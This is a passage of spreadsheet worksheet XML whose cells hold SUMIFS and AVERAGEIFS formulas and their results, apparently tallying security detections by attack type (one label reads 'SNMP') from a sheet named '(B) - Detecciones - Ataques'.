        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>7</v>
      </c>
      <c r="DE46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>2</v>
      </c>
      <c r="DF46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>450</v>
      </c>
      <c r="DI46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>112</v>
      </c>
      <c r="DJ46" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>13</v>
      </c>
      <c r="DK46" s="271"/>
      <c r="DO46" s="439"/>
      <c r="DP46" s="435" t="s">
        <v>2507</v>
      </c>
      <c r="DQ46" s="427">
        <f t="shared" ref="DQ46:DT46" si="34">1-DQ45</f>
        <v>0.8695652174</v>
      </c>
      <c r="DR46" s="427">
        <f t="shared" si="34"/>
        <v>0.5652173913</v>
      </c>
      <c r="DS46" s="427">
        <f t="shared" si="34"/>
        <v>0.347826087</v>
      </c>
      <c r="DT46" s="427">
        <f t="shared" si="34"/>
        <v>0.3043478261</v>
      </c>
      <c r="DU46" s="441"/>
      <c r="DV46" s="271"/>
      <c r="DW46" s="435" t="s">
        <v>2508</v>
      </c>
      <c r="DX46" s="443">
        <f t="shared" ref="DX46:EA46" si="35">1-DX45</f>
        <v>0.8918918919</v>
      </c>
      <c r="DY46" s="443">
        <f t="shared" si="35"/>
        <v>0.6756756757</v>
      </c>
      <c r="DZ46" s="443">
        <f t="shared" si="35"/>
        <v>0.4864864865</v>
      </c>
      <c r="EA46" s="443">
        <f t="shared" si="35"/>
        <v>0.4459459459</v>
      </c>
      <c r="EB46" s="437"/>
      <c r="EC46" s="271"/>
      <c r="ED46" s="280"/>
      <c r="EG46" s="279"/>
      <c r="EH46" s="438"/>
      <c r="EI46" s="271"/>
      <c r="EJ46" s="271"/>
      <c r="EK46" s="271"/>
      <c r="EL46" s="271"/>
      <c r="EM46" s="271"/>
      <c r="EN46" s="271"/>
      <c r="EO46" s="444" t="s">
        <v>12</v>
      </c>
      <c r="EP46" s="271"/>
      <c r="EQ46" s="271"/>
      <c r="ER46" s="271"/>
      <c r="ES46" s="271"/>
      <c r="ET46" s="271"/>
      <c r="EU46" s="271"/>
      <c r="EV46" s="271"/>
      <c r="EW46" s="432"/>
      <c r="EX46" s="432"/>
      <c r="EY46" s="432"/>
      <c r="EZ46" s="432"/>
      <c r="FA46" s="367"/>
      <c r="FC46" s="299"/>
      <c r="FD46" s="46"/>
      <c r="FE46" s="300" t="s">
        <v>6</v>
      </c>
      <c r="FF46" s="301" t="s">
        <v>7</v>
      </c>
      <c r="FG46" s="301" t="s">
        <v>8</v>
      </c>
      <c r="FH46" s="302" t="s">
        <v>9</v>
      </c>
      <c r="FK46" s="445"/>
      <c r="FL46" s="359"/>
      <c r="FM46" s="359"/>
      <c r="FN46" s="359"/>
      <c r="FO46" s="359"/>
      <c r="FP46" s="359"/>
      <c r="FQ46" s="392"/>
      <c r="FR46" s="392"/>
      <c r="FS46" s="392"/>
      <c r="FT46" s="392"/>
      <c r="FU46" s="392"/>
      <c r="FV46" s="392"/>
      <c r="FW46" s="392"/>
      <c r="FX46" s="392"/>
      <c r="FY46" s="21" t="s">
        <v>6</v>
      </c>
      <c r="GB46" s="392"/>
      <c r="GC46" s="21" t="s">
        <v>7</v>
      </c>
      <c r="GF46" s="392"/>
      <c r="GG46" s="446" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SNMP")</f>
        <v>SNMP</v>
      </c>
      <c r="GH46" s="447">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG46)</f>
        <v>0</v>
      </c>
      <c r="GI46" s="448">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG46)</f>
        <v>0</v>
      </c>
      <c r="GJ46" s="449">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG46)</f>
        <v>0</v>
      </c>
      <c r="GK46" s="446" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SNMP")</f>
        <v>SNMP</v>
      </c>
      <c r="GL46" s="447">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG46)</f>
        <v>0</v>
      </c>
      <c r="GM46" s="448">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG46)</f>
        <v>0</v>
      </c>
      <c r="GN46" s="450">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG46)</f>
        <v>0</v>
      </c>
      <c r="GO46" s="446" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SNMP")</f>
        <v>SNMP</v>
      </c>
      <c r="GP46" s="447">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG46)</f>
        <v>0</v>
      </c>
      <c r="GQ46" s="448">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG46)</f>
        <v>0</v>
      </c>
      <c r="GR46" s="450">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG46)</f>
        <v>0</v>
      </c>
      <c r="GS46" s="446" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SNMP")</f>
        <v>SNMP</v>
      </c>
      <c r="GT46" s="447">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG46)</f>
        <v>0</v>
      </c>
      <c r="GU46" s="448">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG46)</f>
        <v>0</v>
      </c>
      <c r="GV46" s="450">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG46)</f>
        <v>0</v>
      </c>
      <c r="GW46" s="392"/>
      <c r="GX46" s="392"/>
      <c r="GY46" s="392"/>
      <c r="GZ46" s="392"/>
      <c r="HA46" s="392"/>
      <c r="HB46" s="392"/>
      <c r="HC46" s="392"/>
      <c r="HD46" s="392"/>
      <c r="HE46" s="392"/>
      <c r="HF46" s="392"/>
      <c r="HG46" s="392"/>
      <c r="HH46" s="392"/>
      <c r="HI46" s="392"/>
      <c r="HJ46" s="392"/>
      <c r="HK46" s="392"/>
      <c r="HL46" s="392"/>
      <c r="HM46" s="392"/>
      <c r="HN46" s="392"/>
      <c r="HO46" s="392"/>
      <c r="HP46" s="392"/>
    </row>
    <row r="47">
      <c r="B47" s="277"/>
      <c r="C47" s="271"/>
      <c r="D47" s="271"/>
      <c r="E47" s="271"/>
      <c r="F47" s="271"/>
      <c r="G47" s="278"/>
      <c r="J47" s="277"/>
      <c r="K47" s="434"/>
      <c r="L47" s="353"/>
      <c r="M47" s="353"/>
      <c r="N47" s="354"/>
      <c r="O47" s="278"/>
      <c r="Q47" s="271"/>
      <c r="R47" s="386" t="s">
        <v>2492</v>
      </c>
      <c r="S47" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>7076</v>
      </c>
      <c r="T47" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>6950</v>
      </c>
      <c r="U47" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>120</v>
      </c>
      <c r="V47" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>14</v>
      </c>
      <c r="W47" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X47" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>14120</v>
      </c>
      <c r="Y47" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>13</v>
      </c>
      <c r="Z47" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>139555</v>
      </c>
      <c r="AA47" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>186</v>
      </c>
      <c r="AB47" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>75</v>
      </c>
      <c r="AC47" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>28</v>
      </c>
      <c r="AD47" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>155</v>
      </c>
      <c r="AE47" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>10</v>
      </c>
      <c r="AF47" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>1005</v>
      </c>
      <c r="AG47" s="271"/>
      <c r="AH47" s="386" t="s">
        <v>2492</v>
      </c>
      <c r="AI47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>7067</v>
      </c>
      <c r="AJ47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>8</v>
      </c>
      <c r="AL47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>6950</v>
      </c>
      <c r="AN47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>105</v>
      </c>
      <c r="AR47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>3</v>
      </c>
      <c r="AS47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>1</v>
      </c>
      <c r="AU47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>7</v>
      </c>
      <c r="AV47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>4</v>
      </c>
      <c r="AW47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>12</v>
      </c>
      <c r="AY47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>2</v>
      </c>
      <c r="BA47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>14116</v>
      </c>
      <c r="BD47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>1</v>
      </c>
      <c r="BF47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>3</v>
      </c>
      <c r="BG47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>1</v>
      </c>
      <c r="BI47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>2</v>
      </c>
      <c r="BK47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>9</v>
      </c>
      <c r="BL47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>19614</v>
      </c>
      <c r="BN47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>119940</v>
      </c>
      <c r="BO47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>11</v>
      </c>
      <c r="BR47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>6</v>
      </c>
      <c r="BT47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>2</v>
      </c>
      <c r="BU47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>4</v>
      </c>
      <c r="BX47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>30</v>
      </c>
      <c r="BZ47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>123</v>
      </c>
      <c r="CA47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>1</v>
      </c>
      <c r="CC47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD47" s="355">
